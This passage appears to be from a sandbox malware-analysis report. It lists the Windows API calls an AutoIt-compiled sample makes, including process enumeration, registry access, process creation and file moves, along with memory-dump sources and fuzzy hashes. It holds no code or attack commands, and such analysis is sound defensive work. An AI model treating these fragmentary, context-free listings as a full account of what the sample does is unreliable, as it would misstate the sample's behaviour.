                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00D8175A
                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 00D8175D
                                                                                                                • SysAllocString.OLEAUT32(?), ref: 00D8177B
                                                                                                                • SysFreeString.OLEAUT32(?), ref: 00D81784
                                                                                                                • StringFromGUID2.OLE32(?,?,00000028), ref: 00D817A9
                                                                                                                • SysAllocString.OLEAUT32(?), ref: 00D817B7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                • String ID:
                                                                                                                • API String ID: 3761583154-0
                                                                                                                • Opcode ID: 5c0e7957927407d82eafde364c64ffad69de9a81a8a6309b5b9dda0b82b6888d
                                                                                                                • Instruction ID: 5eb951992ae8b08f5d37db6de9198076db9d7d853aed634f5bcb7dffe6aef2b2
                                                                                                                • Opcode Fuzzy Hash: 5c0e7957927407d82eafde364c64ffad69de9a81a8a6309b5b9dda0b82b6888d
                                                                                                                • Instruction Fuzzy Hash: 5221A47960031AAF9B10AFA8CC88CBF77EDEB09360B458129F945DB250DB70EC468770
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00D431B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 00D431DA
                                                                                                                • lstrcmpiW.KERNEL32(?,?), ref: 00D86A2B
                                                                                                                • _wcscmp.LIBCMT ref: 00D86A49
                                                                                                                • MoveFileW.KERNEL32(?,?), ref: 00D86A62
                                                                                                                  • Part of subcall function 00D86D6D: GetFileAttributesW.KERNEL32(?,?,00000000), ref: 00D86DBA
                                                                                                                  • Part of subcall function 00D86D6D: GetLastError.KERNEL32 ref: 00D86DC5
                                                                                                                  • Part of subcall function 00D86D6D: CreateDirectoryW.KERNEL32(?,00000000), ref: 00D86DD9
                                                                                                                • _wcscat.LIBCMT ref: 00D86AA4
                                                                                                                • SHFileOperationW.SHELL32(?), ref: 00D86B0C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$AttributesCreateDirectoryErrorFullLastMoveNameOperationPath_wcscat_wcscmplstrcmpi
                                                                                                                • String ID: \*.*
                                                                                                                • API String ID: 2323102230-1173974218
                                                                                                                • Opcode ID: 13396edd3452177918963aeaeeab57a7f2ba7951d57e4e2c6883c8144e43610d
                                                                                                                • Instruction ID: 8554e6d4c091f3c9b9da6d41ba2f933ebd4cafe7d52a9c8b90dd66045ad83ffc
                                                                                                                • Opcode Fuzzy Hash: 13396edd3452177918963aeaeeab57a7f2ba7951d57e4e2c6883c8144e43610d
                                                                                                                • Instruction Fuzzy Hash: 9E311EB1800219AACF55EFA4DC45BDDB7B8AF08314F5445AAE509E3141EB30DB89CF74
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __wcsnicmp
                                                                                                                • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                                • API String ID: 1038674560-2734436370
                                                                                                                • Opcode ID: e9dcf1de021744cbf136995e93c1accfe3b5f173af9a0d0bace568e2026a1eb4
                                                                                                                • Instruction ID: 2ce1750426c731996a265cfb5751e21e0879b3f0f5af3713d1138ba74606cf36
                                                                                                                • Opcode Fuzzy Hash: e9dcf1de021744cbf136995e93c1accfe3b5f173af9a0d0bace568e2026a1eb4
                                                                                                                • Instruction Fuzzy Hash: 892129321446117BD631BB399C02EBB73E9DF69750F144426F98987181EBA1DA82D3B1
                                                                                                                APIs
                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00D8180D
                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00D81833
                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 00D81836
                                                                                                                • SysAllocString.OLEAUT32 ref: 00D81857
                                                                                                                • SysFreeString.OLEAUT32 ref: 00D81860
                                                                                                                • StringFromGUID2.OLE32(?,?,00000028), ref: 00D8187A
                                                                                                                • SysAllocString.OLEAUT32(?), ref: 00D81888
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                • String ID:
                                                                                                                • API String ID: 3761583154-0
                                                                                                                • Opcode ID: d24a0eb33c83c0c0ebe568d15ec094792cb43a89ab6abcf6a505fcbf80859644
                                                                                                                • Instruction ID: 82055b1f9b8d37909a02fb414a84e4172c2b027b7fd8915f26f6cb9a2d8daccd
                                                                                                                • Opcode Fuzzy Hash: d24a0eb33c83c0c0ebe568d15ec094792cb43a89ab6abcf6a505fcbf80859644
                                                                                                                • Instruction Fuzzy Hash: 27217435604205BF9B10ABE8CC89DBAB7ECEF09360B448125F915DB264DA74EC468B70
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00D5C619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00D5C657
                                                                                                                  • Part of subcall function 00D5C619: GetStockObject.GDI32(00000011), ref: 00D5C66B
                                                                                                                  • Part of subcall function 00D5C619: SendMessageW.USER32(00000000,00000030,00000000), ref: 00D5C675
                                                                                                                • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00DAA13B
                                                                                                                • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00DAA148
                                                                                                                • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00DAA153
                                                                                                                • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00DAA162
                                                                                                                • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00DAA16E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                • String ID: Msctls_Progress32
                                                                                                                • API String ID: 1025951953-3636473452
                                                                                                                • Opcode ID: 3bc0d107de71cc75376edb2239e30b863c1218d751f08d8922ae1eaee78c25c3
                                                                                                                • Instruction ID: bcdec6f03021ff31b6149198d0e10be5048ff455d5a3e06b6b47edb43054810a
                                                                                                                • Opcode Fuzzy Hash: 3bc0d107de71cc75376edb2239e30b863c1218d751f08d8922ae1eaee78c25c3
                                                                                                                • Instruction Fuzzy Hash: B6115EB1150219BEEF155F65CC86EE77F5DEF09798F014215FA08A6090C6729C21DBB4
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 00DAE14D
                                                                                                                • _memset.LIBCMT ref: 00DAE15C
                                                                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00E03EE0,00E03F24), ref: 00DAE18B
                                                                                                                • CloseHandle.KERNEL32 ref: 00DAE19D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memset$CloseCreateHandleProcess
                                                                                                                • String ID: $?$>
                                                                                                                • API String ID: 3277943733-2278415509
                                                                                                                • Opcode ID: f779d4d714efcfac3033d0b1a932fbc19c103c04ce962afc3e6843a77b5c8c25
                                                                                                                • Instruction ID: 66f4633f26e908622c0719205d3aad21dc7a5d11c7682ad973d914725e0b9315
                                                                                                                • Opcode Fuzzy Hash: f779d4d714efcfac3033d0b1a932fbc19c103c04ce962afc3e6843a77b5c8c25
                                                                                                                • Instruction Fuzzy Hash: B5F082F1A40312BFF3105B76AC06FB77A6DDB09394F040521BA14E61A2D7B78E8086B8
                                                                                                                APIs
                                                                                                                • GetClientRect.USER32(?,?), ref: 00D5C6C0
                                                                                                                • GetWindowRect.USER32(?,?), ref: 00D5C701
                                                                                                                • ScreenToClient.USER32(?,?), ref: 00D5C729
                                                                                                                • GetClientRect.USER32(?,?), ref: 00D5C856
                                                                                                                • GetWindowRect.USER32(?,?), ref: 00D5C86F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Rect$Client$Window$Screen
                                                                                                                • String ID:
                                                                                                                • API String ID: 1296646539-0
                                                                                                                • Opcode ID: 59c052a4714c4575dad9cb7863601216dab02698e504b3f5e04030892fcd9ccc
                                                                                                                • Instruction ID: 80ad53bac676acc5b69366e8ef2e42eb71ed68efed3dbea4ff0d8a756cef751a
                                                                                                                • Opcode Fuzzy Hash: 59c052a4714c4575dad9cb7863601216dab02698e504b3f5e04030892fcd9ccc
                                                                                                                • Instruction Fuzzy Hash: 3DB1197991024ADFDF10CFA8C9807E9BBB1FF08311F149569EC99AB654DB30A944CB64
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memmove$__itow__swprintf
                                                                                                                • String ID:
                                                                                                                • API String ID: 3253778849-0
                                                                                                                • Opcode ID: 0419fee3858b8c2a99dcd1e91b6cf4856a4207e9eddc191b2bfae0a991306dcc
                                                                                                                • Instruction ID: f6ff446f2e3eb71e5545af0d02752436220e1de60c72fd9dd80ecee69d322197
                                                                                                                • Opcode Fuzzy Hash: 0419fee3858b8c2a99dcd1e91b6cf4856a4207e9eddc191b2bfae0a991306dcc
                                                                                                                • Instruction Fuzzy Hash: 4261783051024AABDB01FF60CC92EFE77A9EF45314F084459F89A6B292EB34E905DB71
                                                                                                                APIs
                                                                                                                • CreateToolhelp32Snapshot.KERNEL32 ref: 00DA1B09
                                                                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 00DA1B17
                                                                                                                • __wsplitpath.LIBCMT ref: 00DA1B45
                                                                                                                  • Part of subcall function 00D6297D: __wsplitpath_helper.LIBCMT ref: 00D629BD
                                                                                                                • _wcscat.LIBCMT ref: 00DA1B5A
                                                                                                                • Process32NextW.KERNEL32(00000000,?), ref: 00DA1BD0
                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00DA1BE2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                                                                                                • String ID:
                                                                                                                • API String ID: 1380811348-0
                                                                                                                • Opcode ID: 81d5e5f7b28014cde0777d07986046bee901ef51c201a1098b615362f2972452
                                                                                                                • Instruction ID: 217bffcf7562bb1e1c112a2afed869a2a997ee4af2220d19f933ce5f641f2553
                                                                                                                • Opcode Fuzzy Hash: 81d5e5f7b28014cde0777d07986046bee901ef51c201a1098b615362f2972452
                                                                                                                • Instruction Fuzzy Hash: E0513B715043019FD710EF24D885EABB7E8EF89754F14492EF98597251EB70EA08CBB2
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00D4CAEE: _memmove.LIBCMT ref: 00D4CB2F
                                                                                                                  • Part of subcall function 00DA3AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00DA2AA6,?,?), ref: 00DA3B0E
                                                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00DA2FA0
                                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00DA2FE0
                                                                                                                • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00DA3003
                                                                                                                • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00DA302C
                                                                                                                • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00DA306F
                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00DA307C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                                                                • String ID:
                                                                                                                • API String ID: 4046560759-0
                                                                                                                • Opcode ID: 82d5d43449d5a938139eab0af72c48d06777e52ce23321de814461da5d2cc50e
                                                                                                                • Instruction ID: 2803f9beadfd045832d13396b7975640d4a11d253dd4526871c03247a4f903c9
                                                                                                                • Opcode Fuzzy Hash: 82d5d43449d5a938139eab0af72c48d06777e52ce23321de814461da5d2cc50e
                                                                                                                • Instruction Fuzzy Hash: 3F513631118205AFC704EF68CC85E6ABBEAFF89714F04491DF596872A1DB71EA05CB72
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcscpy$_wcscat
                                                                                                                • String ID:
                                                                                                                • API String ID: 2037614760-0
                                                                                                                • Opcode ID: f1f98a6ec25caa01f90f5d415b32dc8c6c5e2b15692a0a50f5ac00c05728c96b
                                                                                                                • Instruction ID: 544129874a7a8799a04cc3b3702334407303b505e04bed9d6bc6cf305b83fda8
                                                                                                                • Opcode Fuzzy Hash: f1f98a6ec25caa01f90f5d415b32dc8c6c5e2b15692a0a50f5ac00c05728c96b
                                                                                                                • Instruction Fuzzy Hash: 4951C430904215ABCF21EF98C4419BDB7B2EF08712F58404AFD81AB251DB749F85DBB1
                                                                                                                APIs
                                                                                                                • VariantInit.OLEAUT32(?), ref: 00D82AF6
                                                                                                                • VariantClear.OLEAUT32(00000013), ref: 00D82B68
                                                                                                                • VariantClear.OLEAUT32(00000000), ref: 00D82BC3
                                                                                                                • _memmove.LIBCMT ref: 00D82BED
                                                                                                                • VariantClear.OLEAUT32(?), ref: 00D82C3A
                                                                                                                • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00D82C68
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Variant$Clear$ChangeInitType_memmove
                                                                                                                • String ID:
                                                                                                                • API String ID: 1101466143-0
                                                                                                                • Opcode ID: bc8ee4ff445694ea91eb8be65c3b24aa0fb0ddba054dfa62b2a5c97f892e7989
                                                                                                                • Instruction ID: 3c5e927dfac56e5a7b685ccd7361924cd69042085d1fc262b692b8fc128c03fd
                                                                                                                • Opcode Fuzzy Hash: bc8ee4ff445694ea91eb8be65c3b24aa0fb0ddba054dfa62b2a5c97f892e7989
                                                                                                                • Instruction Fuzzy Hash: 3C516CB5A0020AEFCB14DF58C884EAAB7B9FF4C314B158559E949DB314E330E951CFA0
                                                                                                                APIs
                                                                                                                • GetMenu.USER32(?), ref: 00DA833D
                                                                                                                • GetMenuItemCount.USER32(00000000), ref: 00DA8374
                                                                                                                • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00DA839C
                                                                                                                • GetMenuItemID.USER32(?,?), ref: 00DA840B
                                                                                                                • GetSubMenu.USER32(?,?), ref: 00DA8419
                                                                                                                • PostMessageW.USER32(?,00000111,?,00000000), ref: 00DA846A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Menu$Item$CountMessagePostString
                                                                                                                • String ID:
                                                                                                                • API String ID: 650687236-0
                                                                                                                • Opcode ID: aebf2796c3b669a6f5d22883dd90df6bcfa4b80039e4932a09d4fe8fd8cd564e
                                                                                                                • Instruction ID: 2175d6cd324d4646400dd39c054f4717c7f0806bcaefee7f8e1885702c1c496d
                                                                                                                • Opcode Fuzzy Hash: aebf2796c3b669a6f5d22883dd90df6bcfa4b80039e4932a09d4fe8fd8cd564e
                                                                                                                • Instruction Fuzzy Hash: 72519C71A0021AAFCF00EFA4C841AAEBBB5EF49710F144069ED15FB351DB70AE419BB0
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 00D8552E
                                                                                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00D85579
                                                                                                                • IsMenu.USER32(00000000), ref: 00D85599
                                                                                                                • CreatePopupMenu.USER32 ref: 00D855CD
                                                                                                                • GetMenuItemCount.USER32(000000FF), ref: 00D8562B
                                                                                                                • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00D8565C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 3311875123-0
                                                                                                                • Opcode ID: 34b34567f5c6a95540f924df7e14dd8495320f41ee7d0df5491a46e0129c6325
                                                                                                                • Instruction ID: 9737452ae55cae3b224b83108854041ff035f0a7281cdd997662886f7e8dc682
                                                                                                                • Opcode Fuzzy Hash: 34b34567f5c6a95540f924df7e14dd8495320f41ee7d0df5491a46e0129c6325
                                                                                                                • Instruction Fuzzy Hash: 2251E4B0600706EFDF10EF68E889BADBBF5EF05314F584269E4559B298E3709944CB71
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00D5AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00D5AF8E
                                                                                                                • BeginPaint.USER32(?,?,?,?,?,?), ref: 00D5B1C1
                                                                                                                • GetWindowRect.USER32(?,?), ref: 00D5B225
                                                                                                                • ScreenToClient.USER32(?,?), ref: 00D5B242
                                                                                                                • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00D5B253
                                                                                                                • EndPaint.USER32(?,?), ref: 00D5B29D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
